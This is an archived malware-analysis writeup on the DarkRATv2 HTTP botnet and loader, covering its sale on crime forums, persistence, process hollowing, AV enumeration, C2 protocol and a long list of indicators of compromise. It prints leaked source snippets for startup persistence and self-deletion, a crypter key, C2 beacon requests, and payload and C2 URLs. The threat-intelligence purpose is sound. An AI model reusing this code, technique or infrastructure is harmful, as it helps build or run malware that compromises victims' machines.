{ "id": "9a095e28-d1a2-42ff-9ab5-e51e70760a41", "created_at": "2026-04-06T00:11:32.529486Z", "updated_at": "2026-04-10T03:24:18.17756Z", "deleted_at": null, "sha1_hash": "eb9be9938eee5ca90410ed40086bc036d0b3104f", "title": "malware-writeups/DarkRATv2/README.md at master · albertzsigovits/malware-writeups", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2344042, "plain_text": "malware-writeups/DarkRATv2/README.md at master ·\r\nalbertzsigovits/malware-writeups\r\nBy albertzsigovits\r\nArchived: 2026-04-05 16:09:13 UTC\r\nDarkRat v2.2.0\r\nTechnical synopsis of a C++ Native HTTP Botnet and Loader\r\nDescription\r\nDarkrat was first found being advertised on HF and is described by the creator as:\r\nDarkrat is designed as a HTTP loader, it is coded in C++ with no dependency, the Current bot is\r\ndesign for the Windows API! this means, *DarkRat* has no Cross Platform Support.\r\nThis HTTP loader - in reality - acts more like a bot controller.\r\nDisclaimer\r\nThe developer also puts out a small disclaimer in order to avoid potential litigation:\r\nThis is often seen with other RATs.\r\nI, the creator, am not responsible for any actions, and or damages, caused by this software.\r\nYou bear the full responsibility of your actions and acknowledge that this software was created for educational\r\nThis software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the ri\r\nBy using this software, you automatically agree to the above.\r\nCopyright (c) 2017-2019 DarkSpider\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated doc\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 1 of 50\n\nThen my question is: why is it only advertised on underground cybercrime forums?\r\nThe developer\r\nThe dev uses the moniker Darkspider on both HF and both in the compiled executables pdb path.\r\nCrawling through Darkspider's posts on HF, there seems to be some clue to his german/austrian/swiss origin:\r\nThe dev is also present on Discord and has a channel where he announced milestones regarding his RAT:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 2 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 3 of 50\n\nPricing, forums, seller\r\nDarkspider offers 3 packages that customers can potentially choose from:\r\nBasic/GOLD: unlimited\r\nSource Version: There is unfortunately only two version available because I can not give any\r\ndevelopment support (8/10 SOLD)\r\nPrivate Versions: On Request\r\nThe dev also sells source versions which means DarkRatv2 is potentially being re-selled by other individuals too.\r\nRelation to other families\r\nInteresting enough to note that the main description of DarkRAT is basically a copy-paste of AbSent-Loader's\r\ndescription. As we will see with the inner workings, clearly, the developer took a lot of ideas and inspiration from\r\nboth:\r\nhttps://github.com/Tlgyt/AbSent-Loader\r\nhttps://github.com/zettabithf/LiteHTTP\r\nJust recently, a new Botnet was also announced on HF: it has unmistakable ties to DarkRATv2. I will try to keep\r\ntrack all of the different 'forks' of DarRAT, since it's really favored in cybercrime rings:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 4 of 50\n\nHere's a customized DarkRATv2 panel, called GRS:\r\nAdditional documentation:\r\nThe developer maintains a DarkRAT manual on:\r\nhttp://darktools.me/docs/\r\nhttp://wsyl2u7uvfml6p7p.onion/docs/\r\nAlso it's possible to gain additional insights into the workings of the panel by browsing to README.md on a C2\r\nserver:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 5 of 50\n\nFeatures\r\nPanel\r\nTemplate System based on Smarty\r\nDynamic URL Routing\r\nMulti User Support\r\nPlugin System\r\nStatistics of Bots \u0026 online rates\r\nAdvanced Bot Informations\r\nTask Tracking\r\nTask Geo Targeting System\r\nTask Software Targeting System (for .net software)\r\nBot 2.2.0\r\nRunning Persistence\r\nStartup Persistence\r\nInstalled hidden on the FileSystem\r\nDownload \u0026 Execute\r\nUpdate\r\nUninstall\r\nCustom DLL Loading\r\nDirect Connect or RAW forwarder (Like pastebin/gist also supported own plain/raw sites)\r\nAV detection\r\nIncluded Plugins\r\nBotshop with autobuy Bitcoin API\r\nAlpha version of a DDOS (NOT STABLE)\r\nExamples\r\nFunctionalities\r\nExecution flow\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 6 of 50\n\nRunning Persistance\r\nCommand: cmd.exe /k start %APPDATA%\\Microsoft\\Windows\\00jXHoowyD.vbs:\r\nDo\r\nsComputerName = \".\"\r\nSet objWMIService = GetObject(\"winmgmts:\\\\\" \u0026 sComputerName \u0026 \"\\root\\cimv2\")\r\nsQuery = \"SELECT * FROM Win32_Process\"\r\nSet objItems = objWMIService.ExecQuery(sQuery)\r\nDim found\r\nfound = \"false\"\r\nFor Each objItem In objItems\r\nIf objItem.Name = \"00jXHoowyD.exe\" Then\r\nfound = \"true\"\r\nEnd If\r\nNext\r\nIf found = \"false\" Then\r\nDim objShell\r\nSet objShell = WScript.CreateObject(\"WScript.Shell\")\r\nobjShell.Run(\"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe \u003e Nul \")\r\nSet objShell = Nothing\r\nEnd If\r\nWScript.Sleep 1000\r\nLoop\r\nThe vbs file provides periodic checks to ascertain whether the process is running in the background or not.\r\nStartup Persistance\r\nAPI: RegSetValueExA\r\nKey: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinSystem32\r\nValue: C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 7 of 50\n\nTries to be shady by calling itself WinSystem32.\r\nThe Run key points to the following location on the file system.\r\nLeaked source:\r\nvoid addstartup()\r\n{\r\nTCHAR path[100];\r\nGetModuleFileName(NULL, path, 100);\r\nHKEY newValue;\r\nRegOpenKey(HKEY_CURRENT_USER, \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", \u0026newValue\r\nRegSetValueEx(newValue, \"System32\", 0, REG_SZ, (LPBYTE)path, sizeof(path));\r\nRegCloseKey(newValue);\r\n}\r\nInstalled hidden on the FileSystem\r\n\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe\r\nor\r\n\\AppData\\Roaming\\WinBootSystem\\WinBootSystem.exe\r\nBeing hidden means the executable is just put into %APPDATA% under the Windows folder.\r\nUninstall\r\ncmd.exe /C ping 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"%s\"\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 8 of 50\n\nLeaked source:\r\nvoid uninstall() {\r\nremoveRegInstallKey();\r\nstd::string remove = \" /C \\\"PING.EXE -n 5 127.0.0.1 \u0026\u0026 del \" + ExePath() + \"\\\"\";\r\nShellExecute(\r\nNULL,\r\n_T(\"open\"),\r\n_T(\"cmd\"),\r\n_T(remove.c_str()), // params\r\n_T(\" C:\\ \"),\r\nSW_HIDE);\r\n}\r\nAV Detection\r\nwmi with WQL Select * From AntiVirusProduct via root\\SecurityCenter2\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 9 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 10 of 50\n\nLeaked source code:\r\nstd::string getCurrentAv() {\r\nstd::string returnString;\r\nCoInitializeEx(0, 0);\r\nCoInitializeSecurity(0, -1, 0, 0, 0, 3, 0, 0, 0);\r\nIWbemLocator* locator = 0;\r\nCoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)\u0026 loca\r\nIWbemServices* services = 0;\r\nwchar_t* name = L\"root\\\\SecurityCenter2\";\r\nif (SUCCEEDED(locator-\u003eConnectServer(name, 0, 0, 0, 0, 0, 0, \u0026services))) {\r\n//printf(\"Connected!\\n\");\r\n//Lets get system information\r\nCoSetProxyBlanket(services, 10, 0, 0, 3, 3, 0, 0);\r\nwchar_t* query = L\"Select * From AntiVirusProduct\";\r\nIEnumWbemClassObject* e = 0;\r\nif (SUCCEEDED(services-\u003eExecQuery(L\"WQL\", query, WBEM_FLAG_FORWARD_ONLY, 0, \u0026e))) {\r\n//printf(\"Query executed successfuly!\\n\");\r\nIWbemClassObject* object = 0;\r\nULONG u = 0;\r\n//lets enumerate all data from this table\r\nstd::string antiVirus;\r\nwhile (e) {\r\ne-\u003eNext(WBEM_INFINITE, 1, \u0026object, \u0026u);\r\nif (!u) break;//no more data,end enumeration\r\nCComVariant cvtVersion;\r\nobject-\u003eGet(L\"displayName\", 0, \u0026cvtVersion, 0, 0);\r\n//std::wcout \u003c\u003c cvtVersion.bstrVal;\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 11 of 50\n\nreturnString = bstr_to_str(cvtVersion.bstrVal);\r\n}\r\n}\r\nelse\r\nprintf(\"Error executing query!\\n\");\r\n}\r\nelse\r\nprintf(\"Connection error!\\n\");\r\n//Close all used data\r\nservices-\u003eRelease();\r\nlocator-\u003eRelease();\r\nCoUninitialize();\r\nreturn returnString;\r\n}\r\nMutex\r\nAPI: CreateMutexA\r\nValue: Local\\3mCUq1z\r\nThe mutex value is hardcoded and is different between samples. The call to CreateMutex returns a handle to the\r\nmutex '3mCUq1z' in this case.\r\nNext, GetLastError is called to determine whether the handle points to the same mutex that perhaps already\r\nexisted.\r\nThen, the code compares the return of the GetLastError call to the hex value 'B7'. 'B7' is the symbolic constant for\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 12 of 50\n\nERROR_ALREADY_EXISTS.\r\nIf the mutex already exists, it won't re-infect the system.\r\nLeaked source:\r\n//Check if the Bot is Running\r\nCreateMutexA(0, FALSE, \"Local\\\\$myprogram$\"); // try to create a named mutex\r\nif (GetLastError() == ERROR_ALREADY_EXISTS) // did the mutex already exist?\r\nreturn -1; // quit; mutex is released automatically\r\nCustom DLL Loading\r\n1. CreateProcessA - dwCreationFlags 4 - CREATE_SUSPENDED\r\n2. VirtualAlloc\r\n3. GetThreadContext\r\n4. ReadProcessMemory\r\n5. GetModuleHandleA - NtUnmapViewofSection\r\n6. GetProcAddress - ntdll.dll\r\n7. VirtualAllocEx\r\n8. WriteProcessMemory\r\n9. SetThreadContext\r\n10. ResumeThread\r\n11. VirtualFree\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 13 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 14 of 50\n\nThis method is known as process hollowing. Malware can unmap or hollow out code from the memory of a\r\nprocess, and overwrite the same memory space of the process with malicious code. First, the malware needs to\r\ncreate a new process in suspended mode (CreationFlags 4).\r\nNext, the malware swaps out the contents of the benign file with the malicious code. This is where the call to\r\nNtUnmapViewOfSection comes into picture, which is dynamically called from ntdll.dll to unmap the memory of\r\nthe target process.\r\nNow that the memory is unmapped, VirtualAllocEx is called to allocate new memory for the malware, and uses\r\nWriteProcessMemory to write each of the malware’s sections to the target process memory space. The malware\r\nalso calls SetThreadContext to point the entrypoint to a new code section.\r\nAs a last step, the malware resumes the suspended thread by calling ResumeThread, so that the process will\r\ncontinues with newly allocated malicious code.\r\nAnti-debugging techniques\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 15 of 50\n\nAnti-error technique\r\nDarkRATv2 disables Windows error notifications right at the start of the program.\r\nAPI: SetErrorMode\r\nValue: 0x8007h\r\nSEM_FAILCRITICALERRORS\r\nSEM_NOALIGNMENTFAULTEXCEPT\r\nSEM_NOOPENFILEERRORBOX\r\nSEM_NOGPFAULTERRORBOX\r\nLeaked source code\r\nAn early version of the final Botnet was leaked through the following github repo:\r\nhttps://github.com/Tlgyt/The-Collection/blob/master/Source%20Codes/Botnets/DarkRat%20Loader/derkrut/main.cpp\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 16 of 50\n\nThe developer desperately tried to get rid of the leaked source by submitting a dispute through Github:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 17 of 50\n\nAlso discloses his Discord account:\r\nOther references\r\nLeveraging a bit of OSINT, it is also clear that the developer had used lots of resources from LiteHTTP Botnet. It's\r\nclearly a trend: up and coming malware dev take an existing malware as a recipe, add a few modifications here\r\nand there and release the new iteration as a completely new 'product':\r\nhttps://github.com/darkspiderbots/AbSent-Loader/commit/d8e623c682fce9382d771af46463eae7504bc059\r\nhttps://github.com/darkspiderbots/LiteHTTP/commit/2a29698bba64ef1abb98997e9100240dfe37d841\r\nhttps://github.com/darkspiderbots/LiteHTTP/commit/bf970261e8619d11095102007fb1ef77b2b84c93\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 18 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 19 of 50\n\nCryptography\r\nThere's a distinct string in the disassembly of the builder:\r\nIt is also found in the following project: hCrypt, which is an AES encrypted PE Loader:\r\nhttps://github.com/Include-sys/hCrypt/blob/master/Stub/main.cpp\r\n#include \u003cfstream\u003e\r\n#include \"VirtualAES\\VirtualAES.h\"\r\n#include \u003cWindows.h\u003e\r\n#include \u003cTlHelp32.h\u003e\r\n/*\r\n* AES Encrypted and AntiVM PE Loader (Crypter Stub)\r\n*\r\n* https://www.github.com/Include-sys/hCrypt\r\n*\r\n* Coded by Include-sys for Educational Purposes\r\n*/\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 20 of 50\n\n/* Virtual Machine Detection Functions */\r\n/* AES-256 Bit Decryption Function */\r\nvoid AESDecrypt(char* toDecrypt, int size)\r\n{\r\n//Explanation exist in Builder\r\nunsigned char key[KEY_256] = \"S#q-}=6{)BuEV[GDeZy\u003e~M5D/P\u0026Q}6\u003e\";\r\nunsigned char ciphertext[BLOCK_SIZE];\r\nunsigned char decrypted[BLOCK_SIZE];\r\naes_ctx_t* ctx;\r\nvirtualAES::initialize();\r\nctx = virtualAES::allocatectx(key, sizeof(key));\r\nPanel\r\nLogin\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 21 of 50\n\nDashboard\r\nTasks\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 22 of 50\n\nBots\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 23 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 24 of 50\n\nSettings\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 25 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 26 of 50\n\nroutes\r\nPlugins\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 27 of 50\n\nPanel source\r\n../.git/HEAD ref: refs/heads/master\r\n../.git/refs/heads/master d53a9090693032825b8a4401e4975e0ffa1d55a5\r\n../.git/config\r\n[core]\r\nrepositoryformatversion = 0\r\nfilemode = true\r\nbare = false\r\nlogallrefupdates = true\r\n[remote \"origin\"]\r\nurl = https://github.com/darkspiderbots/darkratPanel.git\r\nfetch = +refs/heads/*:refs/remotes/origin/*\r\n[branch \"master\"]\r\nremote = origin\r\nmerge = refs/heads/master\r\nSource filelist\r\n../.git/index\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 28 of 50\n\n.htaccess\r\nREADME.md\r\nfavicon.ico\r\nindex.php\r\nrobots.txt\r\nversions/2.0/composer.json\r\nversions/2.0/index.php\r\nversions/2.0/plugins/about/Controller/aboutConroller.class.php\r\nversions/2.0/plugins/about/about.php\r\nversions/2.0/plugins/about/assets/nav/about.svg\r\nversions/2.0/plugins/about/template/about/about.tpl\r\nversions/2.0/plugins/custom_urls/Controller/routes.class.php\r\nversions/2.0/plugins/custom_urls/custom_urls.php\r\nversions/2.0/plugins/custom_urls/custom_urls.sql\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 29 of 50\n\nversions/2.0/plugins/custom_urls/template/settings/options.tpl\r\nversions/2.0/plugins/ddos/Controller/ddosController.class.php\r\nversions/2.0/plugins/ddos/Controller/ddosHandlerController.php\r\nversions/2.0/plugins/ddos/ddos.php\r\nversions/2.0/plugins/ddos/ddos.sql\r\nversions/2.0/plugins/ddos/dll/ddoshandle.dll\r\nversions/2.0/plugins/ddos/template/ddos/ddoshub.tpl\r\nversions/2.0/plugins/ddos/template/ddos/ddosinfo.tpl\r\nversions/2.0/plugins/example_task_extension/dll/example.dll\r\nversions/2.0/plugins/example_task_extension/example_task_extension.php\r\nversions/2.0/plugins/extreme_onion_routing/Controller/Ajax.class.php\r\nversions/2.0/plugins/extreme_onion_routing/Controller/Backend.class.php\r\nversions/2.0/plugins/extreme_onion_routing/Cron/checkServer.php\r\nversions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.php\r\nversions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.sql\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/extreme_onion_routing.tpl\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/manage_gates.tpl\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/manage_routers.tpl\r\nversions/2.0/plugins/logs/Controller/logController.class.php\r\nversions/2.0/plugins/logs/assets/nav/logs.svg\r\nversions/2.0/plugins/logs/logs.php\r\nversions/2.0/plugins/logs/logs.sql\r\nversions/2.0/plugins/logs/template/log/loginfo.tpl\r\nversions/2.0/plugins/logs/template/log/logs.tpl\r\nversions/2.0/plugins/miner/Controller/miner.class.php\r\nversions/2.0/plugins/miner/dll/Monero_cpu.dll\r\nversions/2.0/plugins/miner/miner.php\r\nversions/2.0/plugins/miner/template/miner/settings.tpl\r\nversions/2.0/plugins/stealer/Controller/PassMain.class.php\r\nversions/2.0/plugins/stealer/Controller/Recovery.class.php\r\nversions/2.0/plugins/stealer/dll/Stealer.dll\r\nversions/2.0/plugins/stealer/stealer.php\r\nversions/2.0/plugins/stealer/stealer.sql\r\nversions/2.0/plugins/stealer/template/passmain/cookiemanager.tpl\r\nversions/2.0/plugins/stealer/template/passmain/passrecovery.tpl\r\nversions/2.0/vendor/autoload.php\r\n...\r\nFull list: https://pastebin.com/A3WYH5C5\r\nC2 communication\r\n#1 Pastebin grab\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 30 of 50\n\nGET /raw/J7vpbEz6 HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gec\r\nHost: pastebin.com\r\n#2 Bot check-in request\r\nPOST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: SUq1rx\r\nHost: 37.44.215.132\r\nContent-Length: 656\r\nrequest=YUhkcFpEMHhOR0V6T0RKbE1TMDBZVEl3TFRWbU4yTXRZak5pTkMwMllXRmtOVEl3TW1Fd01XVW1ZMjl0Y0hWMFpYSnVZV\r\n#3 Admin login page\r\nPOST /login HTTP/1.1\r\nHost: advcash.network\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:99.0) Gecko/20100101 Firefox/99.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 31 of 50\n\nReferer: http://advcash.network/login\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\nCookie: PHPSESSID=abcdefghijklmnopq012345678\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nuserid=USER\u0026pswrd=PASSWORD\r\nHiding C2 addresses\r\nInitially the C2 server address is hidden from your eyes. The developer had implemented a layered approach into\r\nhow a certain sample is deciding which C2 server it connects to.\r\n1. There's a pastebin link in plain text embedded in the sample\r\n2. There's also a decryption key in plain text in the sample\r\n3. Sample gets pastebin link, content is generally a base64 encoded string\r\n4. Decoding the base64 string reveals a binary blob\r\n5. Then the binary blob gets decrypted with the initial key and then the plain-text is the C2 address\r\nPastebin and key relations\r\nPastebin RC4 private key\r\n3CC2ryd2 DE4E24E3E9DEF1F54C1816AC26C18\r\nJ7vpbEz6 28BED2E43A51F81DB74F9318BA1F1A1F\r\nmuEbW4SF tMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa\r\nNdUjPC1w wzXnjDj3i0pLHGhZJGMAkAdKLCpCDygH\r\nQq0sfw23 1YqsiIPGf3mCzRuKqo46ZohUKeZFzTDH\r\nRCw33291 pZ2bEq15zrxIecBpXGR1TqjTSrvOgJiq\r\nwAEXNbVF 9C7BF1FECCE2AA3AA2F424178FD7\r\nWeThNNxK 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN3\r\nEusfX8PQ no sample\r\nDPXyyALg no crypt key\r\nm2h5tLBG 65s8fe8484sf6es8f4\r\nvy8c6ZYT tMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 32 of 50\n\ni1wTNE8w no crypt key\r\nH5UZsfyw Sx4UDJ3HAlxNCiy1Xmvj8L8n84iqiFcr\r\ndNqyCpKw KouYwnCjHFjJcACwDTLiVW0tinMYVqxi\r\nHemhJqcW 5POeBkhLRpl6NfFkxavzAYAhHVi5AD5E\r\nR40x8Ax1 LnqWwGjc3WIioIDbEQUUVHfuVNCgxSI1\r\nMmBK5bMH KP9JHafuX8LZlfXe7r58vK8IxRhULkND\r\nEznTvkbq GHyufDShu65hgduFGd98igfdp56hJugodf2\r\n- agO2mW7VAEV2wxPHaU6FqIu18ZOvOkIC\r\n- G29kZBPCKtzCc0IEWGNFssjPfFIoKasv\r\nXh46Jxgb gNRyjhyuPpRc63DQIGtCMO6WXDRKxIft\r\npt3fxyTg FA27B3E1FE89C2FC184158616C51E/td\u003e\r\nFYN0sb2Z 9DFF1BB88566612A34154A5A9D15F8\r\nIndicators of Compromise\r\nDarkRatv2 versions\r\n1.1.0\r\n2.0.1\r\n2.1.3\r\n2.2.0\r\nPhpmyadmin versions\r\n4.5.4.1\r\n4.6.6deb5\r\nGit repository\r\nhttps://github.com/darkspiderbots/darkratPanel.git\r\nDev pastebin\r\nhttps://pastebin.com/u/darkspiderbots\r\nDeveloper contacts\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 33 of 50\n\nXMPP: darkspider@xmpp.jp\r\nEmail: darkspiderbots@protonmail.com\r\nEmail: darkspider@exploit.im\r\nGithub: github.com/darkspiderbots\r\nSite: darktools.me\r\nSite: darktools.pro\r\nDarkRATv2 builder\r\nSHA256: 27396fe2ff38df7e3b9d67c1112ea6cd7ede1a8e56507cca5aa0a446eb7f4143\r\nPDB: C:\\Users\\darkspider\\Desktop\\DarkRatCoding\\darkrat\\bot\\Release\\Builder.pdb\r\nLicense file: darkrat.lic\r\nGate settings: config.json\r\nPanel package: Panel.zip\r\nBuilder settings\r\nek = Encryption key\r\npu = Pastebin URL or Direct Encrypted URL\r\nmux = Mutex\r\nsup = Startup true/false\r\nri = Request Interval in seconds\r\npre = Running persistance true/false\r\nst = Spread tag\r\nua = User-Agent\r\npn = Some Example for DarkRat Developers\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 34 of 50\n\n{\r\n\"ek\": \"randomkey\",\r\n\"pu\": \"http://pastebin.com/raw/randomuri\",\r\n\"mux\": \"randommutex\",\r\n\"sup\": \"false\",\r\n\"ri\": \"5\",\r\n\"pre\": \"false\",\r\n\"st\": \"main\",\r\n\"ua\": \"randomua\",\r\n\"pn\": { \"FOO\":\"BAR\"}\r\n}\r\nITW and payloads\r\n5.2.77.232/forum/files/taskhost.exe\r\n35.222.227.120/haru.exe\r\n38.37.44.215.132/bin.exe\r\n46.45.81.148.141/dashboard/t.exe\r\n94.140.114.180/file.exe\r\n107.175.64.210/guc.exe\r\n138.68.15.227/drcrypt.exe\r\n138.68.217.234/crypted.exe\r\n185.35.138.22/nice/nice.exe\r\n185.222.202.218/guc.exe\r\n198.23.202.49/guc.exe\r\nadvcash.network/bin.exe\r\nadvclash.online/main.exe\r\ncmailserv19fd.world/guc.exe\r\ncsdstat14tp.world/guc.exe\r\ndarktools.me/demon.exe\r\ndarktools.me/mamasita12.exe\r\ndarktools.me/talkwithdevil.exe\r\ngayahu.com/p/upload/hvnc.exe\r\nhomeless.helpingourfuture.org.uk/trrr/test.exe\r\nmicrosoftpairingservice.biz/csrss.exe\r\nmicrosoftpairingservice.biz/darkrat/csrss.exe\r\nmicrosofttimingservice.biz/darkrat/csrss.exe\r\nmailadvert8231dx.world/hvnc.exe\r\nmailserv964k.world/spread.exe\r\nmailadvert8231dx.world/guc.exe\r\nrubthemoneybear.xyz/lucky/dark.exe\r\nsdstat9624tp.world/guc.exe\r\nsecuritylabs.me/samcrypt1.exe\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 35 of 50\n\nsecuritylabs.me/update.exe\r\nstarserver1274km.world/guc.exe\r\nzadvexmail19mn.world/guc.exe\r\nzmailserv19fd.world/guc.exe\r\nzsdstat14tp.world/guc.exe\r\nC2 servers\r\n5.8.88.111/request\r\n35.223.22.225/request\r\n35.224.116.196/request\r\n37.44.215.132/request\r\n45.118.134.105/request\r\n89.47.162.126/request\r\n89.47.167.155/request\r\n94.140.114.180/request\r\n104.223.20.200/request\r\n104.244.75.179/request\r\n138.68.15.227/request\r\n138.68.217.234/request\r\n149.28.67.170/request\r\n157.230.218.78/request\r\n167.114.95.127/request\r\n178.62.183.205/request\r\n178.62.187.103/request\r\n178.62.189.202/request\r\n185.130.215.184/request\r\n185.193.38.158/request\r\n185.234.72.246/request\r\n192.154.224.113/request\r\nadvcash.network/request\r\nadvertstar777.world/request\r\nadvclash.online/request\r\nbotnumdns.godbuntu.net/request\r\ncactuscooler.space/request\r\ngameclash.online/request\r\ngodbuntu.net/request\r\nlinuxpro.icu/request\r\nhighzebra.cash/request\r\nmicrosoftpairityservice.biz/request\r\nmicrosoftsyncservice.biz/request\r\nplasticfantastic.pw/request\r\nroulette39.club/request\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 36 of 50\n\nruneliteplus.xyz/request\r\nsecuritylabs.me/request\r\ntuu.nu/request\r\nweloverocknroll.online/request\r\nxyro.xyz/request\r\nC2 server resources\r\n../.git\r\n../bots\r\n../dashboard\r\n../ddos\r\n../edituser/1\r\n../login\r\n../phpmyadmin\r\n../request\r\n../settings\r\n../stealer\r\n../tasks\r\n../versions/2.0/plugins/stealer/stealer.sql\r\n../versions/2.0/plugins/hvnc/dll/hvnc.dll\r\n../versions/2.0/templates/v2/install/index.tpl\r\nPlugins\r\ncustom_urls\r\nddos\r\nhvnc\r\nminer\r\nstealer\r\nC2 beacon parameters (before double base64 encoding)\r\nhwid=12a345b6-1a23-1a2b-a1b2-1abc2345d67e\r\n\u0026computername=TEST-PC\r\n\u0026aornot=true\r\n\u0026installedRam=2.000000\r\n\u0026netFramework2=true\r\n\u0026netFramework3=true\r\n\u0026netFramework35=true\r\n\u0026netFramework4=true\r\n\u0026antivirus=\r\n\u0026botversion=2.1.3\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 37 of 50\n\n\u0026gpuName=todo\r\n\u0026cpuName=Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz\r\n\u0026arch=x64\r\n\u0026operingsystem=Windows 7 Service Pack 1\r\n\u0026spreadtag=main\r\nHardcoded User-Agents\r\nUser-Agent: 1FD931B7\r\nUser-Agent: BCC26\r\nUser-Agent: bDZbUf\r\nUser-Agent: rvOgJiq\r\nUser-Agent: SUq1rx\r\nUser-Agent: t7AwFzx\r\nUser-Agent: dIrPpqdynH\r\nUser-Agent: gate\r\nUser-Agent: SenukeDR102\r\nUser-Agent: bDZOQP3\r\nUser-Agent: EznTvkbq\r\nUser-Agent: 971643fc85\r\nUser-Agent: Frisb_bott\r\nUser-Agent: thisisdumb\r\nUser-Agent: XDRKxIft\r\nUser-Agent: update2\r\nUser-Agent: testbot\r\nUser-Agent: testbot777\r\nUser-Agent: hLRpl6N\r\nUser-Agent: agent\r\nUser-Agent: paliwa\r\nUser-Agent: dark\r\nUser-Agent: ACwDTLiV\r\nUser-Agent: qoptv\r\nUser-Agent: test111\r\nUser-Agent: somesecret\r\nUser-Agent: somesecret111\r\nUser-Agent: somesecret222\r\nUser-Agent: buzrcHcgjv\r\nUser-Agent: ranx\r\nUser-Agent: OQ6VI91O344QD7TJGWWF\r\nHardcoded Mutexes\r\nLocal\\muEbW4SF\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 38 of 